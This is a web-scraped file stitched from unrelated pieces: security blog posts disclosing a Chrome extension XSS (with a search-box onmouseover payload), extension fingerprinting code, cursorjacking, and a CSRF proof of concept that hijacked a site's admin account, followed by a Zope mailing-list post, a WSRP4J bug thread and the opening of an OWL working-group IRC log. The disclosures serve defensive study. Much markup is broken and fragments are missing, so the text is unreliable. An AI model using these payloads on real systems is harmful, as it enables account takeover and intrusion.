Google Reader, you do want the ability to click on a link. This extension is there for that. And just that.</i></blockquote> It upgrades link-like texts for a certain domain in Google Reader site to <span style="font-family: 'Courier New', Courier, monospace;"><a></span>nchors. How does it do it?<br /> <pre class="js" name="code">// manifest.json { "update_url":"", "name": "Linkify Code Review URLs for Google Reader™", "version": "1.0.0", "description": "Does what it says", "content_scripts": [ { "all_frames": true, "js": [ "ba-linkify.min.js", "jquery-1.6.2.min.js", "content.js" ], "matches": [ "*" ], "run_at": "document_start" } ] } </pre> It attaches 3 JS files from extension code into any document from . The main logic in those files is: <br /> <pre class="js" name="code"); } </pre> So every node in the document, when its HTML contains '', gets linkified (linkifying is converting <span style="font-family: 'Courier New', Courier, monospace;"></span> to <span style="font-family: 'Courier New', Courier, monospace;"><a href="">anything</a>)</span>and reinserted it into the DOM using <span style="font-family: 'Courier New', Courier, monospace;">innerHTML</span>. Which smells like XSS.<br /> <h2> Exploitation</h2> Manipulating any node in Google Reader to start with and having the XSS payload bypassing linkify engine is very simple. In Google Reader search box just start searching for:<br /> <br /> <span style="font-family: 'Courier New', Courier, monospace;">"onmouseover="if(!window.a){alert(document.domain);window.a=1}//" ddd</span><br /> <br /> and mouseover. Or, even better, visit this handy URL (of course, with the extension installed):="320" /></a></td></tr> <tr><td class="tr-caption" style="text-align: center;">Voila! XSS on</td></tr> </tbody></table> <h2> Lessons to take</h2> </div> <div> <b>Google Extension authors</b> - don't use <span style="font-family: 'Courier New', Courier, monospace;">innerHTML</span> with anything outside your control. Really!<br /> <b>Users</b> - pay attention to what you're installing.</div> </div><img src="" height="1" width="1" alt=""/>[email protected] to Chrome addons hacking: fingerprinting<div dir="ltr" style="text-align: left;" trbidi="on"> <b>tldr;</b> <i>Webpages can sometimes interact with Chrome addons and that might be dangerous, more on that later. Meanwhile, a warmup - trick to detect addons you have installed.</i><br /> <a name='more'></a><br /> While all of us are used to http / https <a href="">URI Schemes</a>, current web applications sometimes use other schemes including:<br /> <ul style="text-align: left;"> <li><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">javascript:</span> URIs <a href="">bypassing XSS filters for years</a></li> <li><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">data:</span> URIs that is a common source of <a href="">new XSS vulnerabilities</a> </li> <li><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">view-source:</span> that may be used for <a href="">UI-redressing attacks</a></li> <li><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">file:</span> that reads your local files</li> </ul> <h2> Tough questions</h2> <div> Throughout the years, there have always been questions on how documents from these schemes are supposed to be isolated from each other (think of it like a 2nd order Same Origin Policy). Typical questions include:</div> <div> <ul style="text-align: left;"> <li>Can XMLHttpRequest from <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">http://</span> document load a <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">file://</span> URL? And the other way around?</li> <li>Can document from <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">https://</span> load script from <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">http://</span>? Should we display SSL warning then?</li> <li>Can <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">http://</span> document have an <a href="">iframe with <span style="font-family: 'Courier New', Courier, monospace;">view-source:</span></a> src?</li> <li>Can <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">data:</span> URI access the DOM of the calling <span style="font-family: 'Courier New', Courier, monospace;">http://</span> document?</li> <li>Can <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">file://</span> URL access a <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">file://</span> from upper directory (it's <a href="">not so obvious</a>)</li> <li>What about:blank?</li> <li>How to handle 30x redirections to each of those schemes?</li> <li>What about <a href="">passing Referer header across schemes</a>?</li> <li>Can I <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">window.open()</span> across schemes? Would <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">window.postMessage()</span> work?</li> <li>and many, many <a href="">more issues</a></li> </ul> <div> In general, all this questions come down to:<br /> <ul style="text-align: left;"> <li>How should we isolate the schemes from each other?</li> <li>What information is allowed to leak between scheme boundaries?</li> </ul> Every single decision that has been made by browser vendors (or standard bodies) in those cases has consequences to security. There are differences in implementation, some of them very subtle. <b>And there are subtle vulnerabilities</b>. Let me present one example of such vulnerability.<br /> <h2> Meet chrome-extension://</h2> </div> </div> <div> Google Chrome addons are packaged pieces of HTML(5) + Javascript applications. They may:</div> <div> <ul style="text-align: left;"> <li>add buttons to the interface</li> <li>launch background tasks</li> <li>interact with pages you browse</li> <li>...</li> </ul> <div> All extension resources are loaded from dedicated <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">chrome-extension://</span> URLs . Each extension has a global unique identifier. For example, </div> </div> <div> <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">chrome-extension://oadboiipflhobonjjffjbfekfjcgkhco/help.html</span> is URL representing <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">help.html</span> page from <a href="">Google Chrome to Phone</a> (you can try it, if you have this extension enabled).</div> <div> <br /></div> <div> Extension <a href="">interact with web pages that you visit</a> and have access to their DOM, but the Javascript execution context is separated (they cannot call each other Javascript code - and for a good reason). </div> <div> <br /></div> <div> However even in this separation model there is still place for page <-> addon cooperation. Malicious HTTP pages might interact with addons in various ways. One simple example is addon enumeration.<br /> <h2> Finding your addons one by one</h2> With a little Javascript code I can easily test if you're using a certain Chrome addon. Give me a <a href="">list of most popular extensions</a> and I'll test all of them in milliseconds. Why would I want that as an attacker?<br /> <ul style="text-align: left;"> <li>to <a href="">fingerprint your browser</a> (ad networks love this)</li> <li>to start attack against a certain known vulnerable addon (wait for the next post for this ;) )</li> </ul> <div> See demo of <a href=""><b>Chrome addons fingerprinting</b></a>. (src <a href="">here</a>) <br /> <h2> How?</h2> The trick is dead simple:<br /> <pre class="javascript" name="code">var detect = function(base, if_installed, if_not_installed) { var s = document.createElement('script'); s.onerror = if_not_installed; s.onload = if_installed; document.body.appendChild(s); s.src = base + '/manifest.json'; } detect('chrome-extension://' + addon_id_youre_after, function() {alert('boom!');}); </pre> Every addon has a <span style="font-family: 'Courier New', Courier, monospace;">manifest.json</span> file. In <span style="font-family: 'Courier New', Courier, monospace;">http[s]://</span> page you can try to load a script cross-scheme from <span style="font-family: 'Courier New', Courier, monospace;">chrome-extension://</span> URL, in this case - the manifest file. You just need the addon unique id to put into URL. If the extension is installed, manifest will load and <span style="font-family: 'Courier New', Courier, monospace;">onload</span> event will fire. If not - <span style="font-family: 'Courier New', Courier, monospace;">onerror</span> event is there for you.<br /><b>Update: </b>TIL the technique was already <a href="">published</a> by <a href="">@albinowax</a>. Cool!<br /> <br /> This is just one simple example of punching the separation layer between addons and webpages. There are more coming. Stay tuned.</div> </div> </div><img src="" height="1" width="1" alt=""/>[email protected] again<div dir="ltr" style="text-align: left;" trbidi="on"> <div dir="ltr" style="text-align: left;" trbidi="on"> About a year ago, <a href="">Marcus Niemietz</a> demonstrated UI redressing technique called <a href="">cursorjacking</a>. It deceived users by using a custom cursor image, where the pointer was displayed with an offset. So the displayed cursor was shifted to the right from the actual mouse position. With clever positioning of page elements attacker could direct user clicks to desired elements.<br /> <h2> Cursor fun</h2> Yesterday <a href="">Mario Heiderich</a> noticed that </div> <pre class="html" name="code"><body style="cursor:none"> </pre> works across User-Agents, so one could easily totally hide the original mouse cursor. Combine that with <span style="font-family: 'Courier New', Courier, monospace;">mousemove</span> listener, mouse cursor image and a little distraction and we have another UI redressing vector. The idea is very simple:<br /> <pre class="html" name="code">> <;">The one on the left is real, right is fake. The idea is to distract you from noticing the left one.</td></tr> </tbody></table> <h2> Demo</h2> It's just a sketch (e.g. in real life one would have to handle skipping mouse cursor when it's over a frame), but it works nonetheless. Try this <a href="">good cursorjacking example</a> ;) Here's <a href="">sources</a> for anyone interested.<br /> <h2> Bonus</h2> <a href="">NoScript ClearClick</a> (a clickjacking protection) works, because it detects clicks on areas that are hidden from the user (e.g. with <span style="font-family: 'Courier New', Courier, monospace;">opacity:0</span>). With cursorjacking the protection won't get triggered as attacker is not hiding the original element to click on (Twitter button in the PoC). The only deception is distraction. So, currently, this technique is a <b>NoScript ClearClick protection bypass</b>. <br /><b>Update</b>: Fixed in <a href="">NoScript 2.2.8 RC1</a></div><img src="" height="1" width="1" alt=""/>[email protected]! oracle crypto xmas challenge<div dir="ltr" style="text-align: left;" trbidi="on"> It's this time of the year, and I'm sitting here and launching <a href="">Beathis oracle! crypto xmas challenge</a> for you guys. Enjoy! It's a bit different than the <a href="">last</a> but I like it more. There's only one level, but it should be challenging.</div><img src="" height="1" width="1" alt=""/>[email protected] admin account hijack<div dir="ltr" style="text-align: left;" trbidi="on"> <div dir="ltr" style="text-align: left;" trbidi="on"> Potato chips, post-it notes, LSD and Viagra - all these things were discovered by accident. As it seems, sometimes great discoveries come by a surprise. I've had my moment of surprise lately. It all started during my research on sites using Cross Origin Resource Sharing. You know me, I just have to check the real-world HTML5 implementations. So there I am, checking sites implementing CORS headers. <a href="">Geocommons.com</a> is one of them - and this is the story of <b>how geocommons got really common</b>.<br /> <br /> GeoCommons is the public community of GeoIQ users who are building an open repository of data and maps for the world. The GeoIQ platform includes a large number of features that empower you to easily access, visualize and analyze your data. <br /> <br /> There was a <b>critical vulnerability</b> in geocommons.com website allowing<b> any user</b> to change e-mail address of administrative user and <strong>hijack the admin account</strong>. According to vendor, vulnerability is now fixed.<br /> <a name='more'></a><h2> The simple vuln</h2> Every user of geocommons.com is allowed to manage his/hers account credentials. Among other features, he's allowed to change the e-mail address. These functions are accessible by sending POST requests to <code>[user-id]</code> URL. Sample POST content changing e-mail address of an account looks like this: <br /> <pre name="code">_method=put&user%5Bemail%[email protected]&commit=Save&user%5Bterms_of_use%5D=1</pre> I quickly confirmed that the form is vulnerable to CSRF. <a href="">CSRF</a> allows for form submission on behalf of any user logged in to geocommons.com. <b>Knowing user ID</b> (it needs to be in URL) attacker can convince user to visit a page sending POST request changing user's e-mail address.<br /> <br /> <b>Close, but no cigar.</b> Sure, attacker can send thousands of requests and one of them would finally succeed (once he reaches the correct user id).<br /> <h2> Moment of surprise</h2> <div> Just to check, I started doing some PoC. I created a user (his ID was 35 thousands something), and made him visit the CSRF page:<br /> <br /></div> <pre class="javascript" name="code"> for (var i = 0; i < 50000; i++) { post = { '_method':'put', 'user[email]': 'securityvictim+exploit' + i + '@gmail.com', 'commit' : 'Save', 'user[terms_of_use]':'1', }; $.ajax({ url: '' + i, data: post, type: 'POST', complete: function() {console.log(user)} }); </pre> <br /> The code tried to replace user email with my <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">[email protected]</span> email (with <a href="">+tag</a>). Well, it was slow as hell. So I stopped. Just to check if anything succeeded, I browsed the geocommons.com site and searched for users with that;">WTF????</td></tr> </tbody></table> I replaced <b>admin </b>account e-mail!<br /> <br /> As it turned out, there is also a <strong>critical</strong> vulnerability, allowing ANY user to change admin account e-mail address. One only needs to submit the form to <code></code> (1 is user id of admin). Bitter CSRF just got a lot sweeter :)<br /> <br /> Combining these two vulnerabilities, it is possible for an attacker to submit a form changing admin e-mail, <strong>while leaving all the traces to victim</strong> who was CSRFed. After changing the e-mail address to one under his control, attacker can simply use forget password feature of the site to get the new temporary password and effectively hijack the admin account of <code>geocommons.coms</code><br /> <h2> See for yourselves<;">Form;">with new email<="320" /></a></td></tr> <tr><td class="tr-caption" style="text-align: center;">And a password reset<="64" src="" width="320" /></a></td></tr> <tr><td class="tr-caption" style="text-align: center;">... sent conveniently to attacker's account</td></tr> </tbody></table> <h2> And all the admin goodies...</h2> ="170";"><img border="0" height="216" src="" width="320" /></a></div> <br /></div> What's interesting, it's only admin (<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">id=1</span>) account that is so special, I cannot change the email of any other user (apart from myself). It might have something to do with the fact that admin can change properties of any other user, but who knows...<br /> <br /> <b>Timeline:</b><br /> 6.10.2011 - vulnerability discovered, PoC made<br /> 7.10.2011 - vendor notified & replied<br /> 11.10.2011 - vendor comment: issue fixed in codebase, we will be deploying soon<br /> 25.10.2011 - vendor comment: we are deploying today<br /> 22.11.2011 - public disclosure<br /> <h2> Notes for developers</h2> <ul style="text-align: left;"> <li>Protect against CSRF by using unique nonces. CSRF is serious!</li> <li>If you're trying to protect only some of the forms (e.g. login form, password change form), always remember that e-mail address change form (or. e.g. security question change) form is equally important! With CSRF flaw there, attacker does not need to know the password, he can switch the e-mails and use the forget password feature to regenerate one.</li> </ul> <br /> <br /></div><img src="" height="1" width="1" alt=""/>[email protected] | http://feeds.feedburner.com/TheWorldAccordingToKoto | CC-MAIN-2019-22 | en | refinedweb |
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Stephan Richter wrote: > On Wednesday 15 August 2007 08:01, Christian Theune wrote: >> zope.traversing has a dependency to zope.app.applicationcontroller. This >> is because zope.traversing implements the "etc" namespace and has a hard >> coded reference to "applicationcontrol" there. >> >>. > > I think that zope.app.component would be a good candidate, because "etc" is > pretty much about accessing the local site. I know it was originally designed > for allowing many different non-content things to be plugged in, but this has > not materialized. > > An alternative would be to get rid of ++etc++ and implement ++site++ and > ++control++. Now that I think about it, I actually favor this. ;-)
Advertising
Or change zope.traversing such that it looks up namespace-based stuff via a named utility / adapter; then packages which supply a namespace are not dependencies at all. Tres. - -- =================================================================== Tres Seaver +1 540-429-0999 [EMAIL PROTECTED] Palladion Software "Excellence by Design" -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - iD8DBQFGww/h+gerLs4ltQ4RAm0LAJ491mh0nC4XbsX/SEG+d/0VHRUhBwCgoPkp XMLdvvMdQkoL2DKDfvQXA8s= =nvgz -----END PGP SIGNATURE----- _______________________________________________ Zope3-dev mailing list [email protected] Unsub: | https://www.mail-archive.com/[email protected]/msg09074.html | CC-MAIN-2017-51 | en | refinedweb |
Back to index
import "nsISupports.idl";
Go to the source code of this file.
The signature for the reader function passed to WriteSegments.
This is the "provider" of data that gets written into the stream's buffer.
Implementers should return the following:
Errors are never passed to the caller of WriteSegments.
FROZEN
Definition at line 67 of file nsIOutputStream.idl. | https://sourcecodebrowser.com/lightning-sunbird/0.9plus-pnobinonly/ns_i_output_stream_8idl.html | CC-MAIN-2017-51 | en | refinedweb |
Hi everybody. As of now, my server will accept clients in a loop, and will pass those clients off into a new windows thread. Inside the thread, the server will be able to receive any data each client may send.
When a client connects, the clientsConnected variable increments. So when 3 clients have connected, clientsConnected will hold a value of 3.
Trouble is, I do not know how to better maintain these connections.
Things I want to implement, but don't know how.
- If a client disconnects, I want clientsConnected to drop down to 2.
- I want to be able to hold data relating to each socket, such as "name".
- I want to be able to loop through this container of all sockets and be able to send a message to all of them (client0, client1, client2, etc.) depending on how you help me manage all of these sockets.
Here is my current code:
#include <windows.h> #include <stdlib.h> #include <stdio.h> #include <winsock.h> #include <iostream> using namespace std; // thread for receiving commands DWORD WINAPI receive_commands(LPVOID lpParam) { //set socket to the socket passed in as parameter SOCKET current_client = (SOCKET)lpParam; char receiveBuffer[256]; //buffer to hold received data char sendBuffer[256]; //buffer to hold sent data int result; //contains return values for error checking //main loop while (true) { result = recv(current_client, receiveBuffer, sizeof(receiveBuffer), 0); Sleep(10); if (result > 0) { cout << "Client " << "??: " << receiveBuffer << endl; if(strstr(receiveBuffer, "hello")) { //greet the user strcpy(sendBuffer, "Hello."); Sleep(10); send(current_client, sendBuffer, sizeof(sendBuffer), 0); } if(strstr(receiveBuffer, "goodbye")) { //disconnect the user strcpy(sendBuffer, "Goodbye!"); Sleep(10); send(current_client, sendBuffer, sizeof(sendBuffer), 0); //close the socket and end the thread closesocket(current_client); ExitThread(0); } //clear the buffers strcpy(sendBuffer, ""); strcpy(receiveBuffer, ""); } } // end while } // end receive_commands int main() { SOCKET sock; //the master socket which listens for connections DWORD thread; //for the thread WSADATA wsaData; sockaddr_in server; int port = 54321; int clientsConnected = 0; cout << "Server v1.0\n"; cout << "===================\n"; //start winsock int ret = WSAStartup(MAKEWORD(2,2), &wsaData); if(ret != 0) { cout << "Winsock failed to start.\n"; system("pause"); return 1; } //error checking else { cout << "\nVersion: " << wsaData.wVersion << "\nDescription: " << wsaData.szDescription << "\nStatus: " << wsaData.szSystemStatus << endl << endl; } //fill in winsock struct server.sin_family = AF_INET; server.sin_addr.s_addr = INADDR_ANY; server.sin_port = htons(port); //listen on port 54321 //create the socket sock = socket(AF_INET, SOCK_STREAM, 0); if(sock == INVALID_SOCKET) { cout << "Invalid Socket.\n"; system("pause"); return 1; } //error checking //bind the socket to our port (built in error-checking) if( bind(sock, (sockaddr*)&server, sizeof(server)) != 0 ) { printf(""); return 1; } //listen for a connection if(listen(sock, 5) != 0) { return 1; } //client socket SOCKET client; sockaddr_in from; int fromlen = sizeof(from); //loop forever while (true) { //accept connections client = accept(sock, (struct sockaddr*)&from, &fromlen); cout << "Client connected.\n"; clientsConnected++; cout << "Clients online: " << clientsConnected << endl; //create a thread and pass new client socket as parameter CreateThread(NULL, 0, receive_commands, (LPVOID)client, 0, &thread); } //shutdown winsock closesocket(sock); WSACleanup(); //exit return 0; } | https://www.daniweb.com/programming/software-development/threads/223019/best-way-to-maintain-multiple-client-sockets | CC-MAIN-2017-51 | en | refinedweb |
Locks, Actors, And Stm In Pictures
All programs with concurrency have the same problem.
Your program uses some memory:
When your code is single-threaded, there's just one thread writing to memory. You are A-OK:
But if you have more than one thread, they could overwrite each others changes!
You have three ways of dealing with this problem:
- Locks
- Actors
- Software Transactional Memory
I'll solve a classic concurrency problem all three ways and we can see which way is best. I'm solving the Dining Philosophers problem. If you don't know it, check out part 1 of this post!
Locks
When your code accesses some memory, you lock it up:
mutex == the lock.
critical section == the code locked with a mutex.
Now if a thread wants to run this code, he (or she) needs the key. So only one thread can run the code at a time:
Sweet! Only one thread can write to that memory at a time now. Problem solved! Right?
Here's a Ruby implementation of the resource hierarchy solution.
Each Philosopher gets a left and a right fork (both forks are mutexes):
class Philosopher def initialize(name, left_fork, right_fork) @name = name @left_fork = left_fork @right_fork = right_fork end
Now we try to get the forks:
while true @left_fork.lock puts "Philosopher #@name has one fork..." if @right_fork.try_lock break else puts "Philosopher #@name cannot pickup second fork" @left_fork.unlock end end
- A philosopher picks up fork 1. He waits till he has it (
lockwaits).
- He tries to pick up fork 2, but doesn't wait (
try_lockdoesn't wait).
- If he didn't get fork 2, he puts back fork 1 and tries again.
Full code here. Here's an implementation using a waiter instead.
Locks are super tricky to use. If you use locks, get ready for all sorts of subtle bugs that will make your threads deadlock or starve. This post talks about all the problems you could run into.
Actors
I love actors! You love actors! Actors are solitary and brooding. Every actor manages its own state:
Actors ask each other to do things by passing messages:
Actors never share state so they never need to compete for locks for access to shared data. If actors never block, you will never have deadlock! Actors are never shared between threads, so only one thread ever accesses the actor's state.
When you pass a message to an actor, it goes in his mailbox. The actor reads messages from his mailbox and does those tasks one at a time:
My favorite actor library for Ruby is Celluloid. Here's a simple actor in Celluloid:
class Dog include Celluloid def set_name name @name = name end def get_name @name end end
See that
include Celluloid? That's all it takes, and now every
Dog is an actor!
> d = Dog.new => #<Celluloid::ActorProxy(Dog:0x3fe988c0d60c)> > d.set_name "snowy" => "snowy"
Here we are telling the actor,
d, to set its name to "snowy" synchronously. Here we instead pass it a message to set the name asynchronously:
d.async.set_name "snoopy" => nil d.get_name => "snoopy"
Pretty cool. To solve the dining philosophers problem, we need to model the shared state using an actor. So we introduce a
Waiter:
class Waiter include Celluloid FORK_FREE = 0 FORK_USED = 1 def initialize(forks) @philosophers = [] @eating = [] @forks = [FORK_FREE, FORK_FREE, FORK_FREE, FORK_FREE, FORK_FREE] end end
The waiter is in charge of forks:
When a Philosopher gets hungry, he lets the waiter know by passing a message:
def think puts "#{name} is thinking" sleep(rand) puts "#{name} gets hungry" waiter.async.hungry(Actor.current) end
When the waiter gets the message, he sees if the forks are available.
- If they are available, he will mark them as 'in use' and send the philosopher a message to eat.
If they are in use, he tells the philosopher to keep thinking.
def hungry(philosopher) pos = @philosophers.index(philosopher)
leftpos = pos rightpos = (pos + 1) % @forks.size
if @forks[leftpos] == FORKFREE && @forks[rightpos] == FORKFREE @forks[leftpos] = FORKUSED @forks[rightpos] = FORKUSED @eating << philosopher philosopher.async.eat else philosopher.async.think end end
Full code here. If you want to see what this looks like using locks instead, look here.
The shared state is the forks, and only one thread (the waiter) is managing the shared state. Problem solved! Thanks Actors!
Software Transactional Memory
I'm going to use Haskell for this section, because it has a very good implementation of STM.
STM is very easy to use. It's just like transactions in databases! For example, here's how you pick up two forks atomically:
atomically $ do leftFork <- takeFork left rightFork <- takeFork right
That's it! No need to mess around with locks or message passing. Here's how STM works:
- You make a variable that will contain the shared state. In Haskell this variable is called a
TVar:
You can write to a
TVar using
writeTVar or read using
readTVar. A transaction deals with reading and writing
TVars.
- When a transaction is run in a thread, Haskell creates a transaction log that is for that thread only.
- Whenever one a block of shared memory is written to (with
writeTVar), the address of the
TVarand its new value is written into the log instead of to the
TVar:
- Whenever a block is read (using
readTVar):
- first the thread will search the log for the value(in case the TVar was written by an earlier call to writeTVar).
- if nothing is found, then value is read from the TVar itself, and the TVar and value read are recorded in the log.
In the meantime, other threads could be running their own atomic blocks, and modifying the same
TVar.
When the
atomically block finishes running, the log gets validated. Here's how validation works:
we check each
readTVar recorded in the log and make sure it matches the value in the real
TVar. If they match, the validation succeeds! And we write the new value from the transaction log into the
TVar.
If validation fails, we delete the transaction log and run the block all over again:
Since we're using Haskell, we can guarantee that the block had no side-effects...i.e. we can run it over and over and it will always return the same result!
Haskell also has
TMVars, which are similar. A
TMVar either holds a value or is empty:
You can put a value in a
TMVar using
putTMVar or take the value in the
TMVar using
takeTMVar.
- If there you try to put a value in a
TMVarand there's something there already,
putTMVarwill block until it is empty.
- If there you try to take a value from a
TMVarand it is empty,
takeTMVarwill block until there's something in there.
Our forks are
TMVars. Here are all the fork-related functions:
newFork :: Int -> IO Fork newFork i = newTMVarIO i takeFork :: Fork -> STM Int takeFork fork = takeTMVar fork releaseFork :: Int -> Fork -> STM () releaseFork i fork = putTMVar fork i
A philosopher picks up the two forks:
(leftNum, rightNum) <- atomically $ do leftNum <- takeFork left rightNum <- takeFork right return (leftNum, rightNum)
He eats for a bit:
putStrLn $ printf "%s got forks %d and %d, now eating" name leftNum rightNum delay <- randomRIO (1,3) threadDelay (delay * 1000000) putStrLn (name ++ " is done eating. Going back to thinking.")
And puts the forks back.
atomically $ do releaseFork leftNum left releaseFork rightNum right
Actors require you to restructure your whole program. STM is easier to use – you just specify what parts should run atomically. Clojure and Haskell both have core support for STM. It's also available as modules for a lot of other languages: C, Python, Scala, JavaScript etc etc.
I'm pretty excited to see STM used more!
Conclusion
Locks
- available in most languages
- give you fine-grained control over your code
- Complicated to use. Your code will have subtle deadlock / starvation issues. You probably shouldn't use locks.
Actors
- No shared state, so writing thread-safe is a breeze
- No locks, so no deadlock unless your actors block
- All your code needs to use actors and message passing, so you may need to restructure your code
STM
- Very easy to use, don't need to restructure code
- No locks, so no deadlock
- Good performance (threads spend less time idling)
References
- Dining Philosopher implementations in different languages
- Simon Peyton Jones explains STM
- Carl Hewitt explains Actors
- On Akka, Erlang, and ATOM by tarcieri
For more drawings, check out Functors, Applicatives, and Monads in pictures.blog comments powered by Disqus | http://adit.io/posts/2013-05-15-Locks,-Actors,-And-STM-In-Pictures.html | CC-MAIN-2017-51 | en | refinedweb |
length property itself should not be checked in the code for React child element
- REACT_BAD_LENGTH_CHECK
- Error
- Medium
- react
This rule applies when
length property itself is checked in the code for React child element.
In React, a child element specified as
undefined,
null,
true or
false is excluded from rendering. This feature is often used to render an element conditionally, e.g.
cond && <div>...</div>.
However, the exclusion is not applied to numeric value 0. For example, 0 will be rendered for
array.length && <div>...</div> if
array is empty.
This problem is fixed by using a boolean-valued expression such as
array.length > 0 instead of checking
length property itself.
Noncompliant Code Example
import React from 'react'; class Foo extends React.Component { render() { return ( <div> {this.props.items.length && `(${this.props.items.join(', ')})`} {/* REACT_BAD_LENGTH_CHECK alarm */} </div> ); } }
Compliant Code Example
import React from 'react'; class Foo extends React.Component { render() { return ( <div> {this.props.items.length > 0 && `(${this.props.items.join(', ')})`} </div> ); } }
Version
This rule was introduced in DeepScan 1.3.0-beta. | https://deepscan.io/docs/rules/react-bad-length-check | CC-MAIN-2017-51 | en | refinedweb |
Details
- Type:
Bug
- Status: Resolved
- Priority:
Major
- Resolution: Fixed
- Affects Version/s: current (nightly)
- Fix Version/s: current (nightly)
- Component/s: Proxy Portlet
- Labels:None
- Environment:Ant 1.6.1, Java 1.4.2, GridSphere portal container
Description
ProxyPortlet contains imports and classes available only to jakarta pluto project. I would appreciate either:
A) Rewrite the necessary code to ONLY reference those objects defined by JSR 168 portlet specification
OR
B) Specify portal vendor specific bahavior in another interface that my portal can provide an implementation of....
Thanks, Jason
Activity
- All
- Work Log
- History
- Activity
- Transitions
Hello
I saw that the Pluto's libraries are used in org.apache.wsrp4j.consumer.proxyportlet.impl.ProxyPortlet and org.apache.wsrp4j.consumer.proxyportlet.impl.WSRPRequestImpl classes.
In ProxyPortlet class the Pluto's libraries are used in the processAction, render and getWindowSession methods. In this cases Pluto's libraries are always used to obtain the portlet window object and this is used to obtain the portlet window ID or the portlet entity ID.
What is a portlet window in Pluto? Portlet Window is part of an aggregation tree that contains the portlet markup. Reading the JSR-168 Specification we can read the phrase "The occurrence of a portlet and preferences-object in a portal page is called a portlet window." Are both the same thing? I think that both are the same thing. Does some mechanism exist to identify unambiguously the portlet window in the JSR-168 Specification? Yes it does, the used mechanism is the portlet namespace. Therefore, in my code I use the namespace instead of the portlet window ID, because the namespace is standard and portlet window ID is Pluto dependent.
What we can do with portlet entity ID? The portlet entity in Pluto is a parameterized portlet definition, belonging to a user. I understand that an entity is a portlet + preferences-object, belonging to a user. Can the portlet entity ID be changed by standard something? I searched it in the JSR-168 Specification but I didn't find it. Then I asked myself, which is the use of portlet entity ID? The portlet entity ID is used in GroupSessionImpl class as key to store a portlet session object in a hashtable, and this portlet session object contains a session context and a Map where are stored window session objects, in this Map the used key is the portlet window ID, that is, the namespace. Firstly I thought change this structure, in my mind I thought in a unique structure where the key was the namespace, but I don't have enough time to try it and I don't have enough knowledge about WSRP4J proxy portlet code. Then I found a more simple solution, I realised that if I used the portlet name instead of portlet entity ID, my solution was correct in all those cases where the portlet entity was the same for all portlet windows, that is, if I had a unique portlet entity declaration in the portletentityregistry.xml file and I used this entity several times in the pageregistry.xml file, the portlet name worked correctly as key. But if other portlet entity declaration existed then the portlet name wasn't useful as key.
Thinking in this situation I realised that this is a good solution, what? let me explain. The mistake of this solution is that only a unique entity declaration can exist per portlet declaration in the portlet deployment descriptor file. Why not have one portlet declaration in the portlet deployment descriptor file (portlet.xml) per entity? If we have different entity declarations it's because we have different preferences for same portlet. In the case of proxy portlet it involves to load a different portlet from provider or change the provider, bear it in mind. If all these remote portlets were local portlets then a portlet declaration per each one would exist. Moreover, this solution doesn't require big changes in source code. This is my solution to achieve independence of WSRP4J Proxy Portlet from Pluto.
Finally, in WSRPRequestImpl class I use the same idea, except in the case where Pluto's libraries are used to read the MIME types set. Read the code, this is commented.
Excuse me for my bad English. Any opinion about it will be welcome, thanks in advance.
Regards
Sandy
PD: This solution includes the code that solves a bug registered in Jira with code
WSRP4J-6.
This solution is tested on Pluto and JBoss. I hope tested it in more portlet container.
Special thanks to Iñaki Paz for his advices.
| https://issues.apache.org/jira/browse/WSRP4J-30 | CC-MAIN-2017-51 | en | refinedweb |
Chatlog 2008-11-12
From OWL
See original RRSAgent log and preview nicely formatted version.
Please justify/explain all edits to this page, in your "edit summary" text.
00:00:00 <MarkusK_> PRESENT: Peter Patel-Schneider, Markus Krötzsch, Ivan Herman, Jie Bao, Jos de Bruijn, Boris Motik, Alan Ruttenberg, Uli Sattler, Sandro Hawke, Zhe Wu, clu, Michael Schneider, Bernardo Cuenca Grau, Mike Smith, Rinke Hoekstra, Achille Fokoue, Jeff Pan 00:00:00 <MarkusK_> REGRETS: Christine Golbreich, Evan Wallace, Ian Horrocks, Elisa Kendall 00:00:00 <MarkusK_> CHAIR: Alan Ruttenberg 17:49:12 <RRSAgent> RRSAgent has joined #owl 17:49:12 <RRSAgent> logging to 17:49:21 <pfps> Zakim, this is owlwg 17:49:21 <Zakim> pfps, I see SW_OWL()1:00PM in the schedule but not yet started. Perhaps you mean "this will be owlwg". 17:49:28 <pfps> Zakim, this will be owlwg 17:49:28 <Zakim> ok, pfps; I see SW_OWL()1:00PM scheduled to start in 11 minutes 17:49:39 <pfps> RRSagent, make records public 17:54:57 <schneid> schneid has joined #owl 17:55:22 <Zakim> SW_OWL()1:00PM has now started 17:55:29 <Zakim> +Peter_Patel-Schneider 17:57:33 <MarkusK_> MarkusK_ has joined #owl 17:58:01 <ivan> ivan has joined #owl 17:58:06 <Zakim> +??P7 17:58:16 <ivan> zakim, dial ivan-voip 17:58:16 <Zakim> ok, ivan; the call is being made 17:58:18 <Zakim> +Ivan 17:58:34 <uli> uli has joined #owl 17:58:35 <ivan> zakim, drop me 17:58:35 <Zakim> Ivan is being disconnected 17:58:37 <Zakim> -Ivan 17:59:01 <ivan> zakim, dial ivan-voip 17:59:01 <Zakim> ok, ivan; the call is being made 17:59:03 <Zakim> +Ivan 17:59:07 <Zakim> + +1.518.276.aaaa 17:59:13 <bmotik> bmotik has joined #owl 17:59:29 <josb> josb has joined #owl 17:59:38 <alanr_> alanr_ has joined #owl 17:59:39 <Zakim> +josb 17:59:41 <Zakim> +??P11 17:59:44 <bmotik> 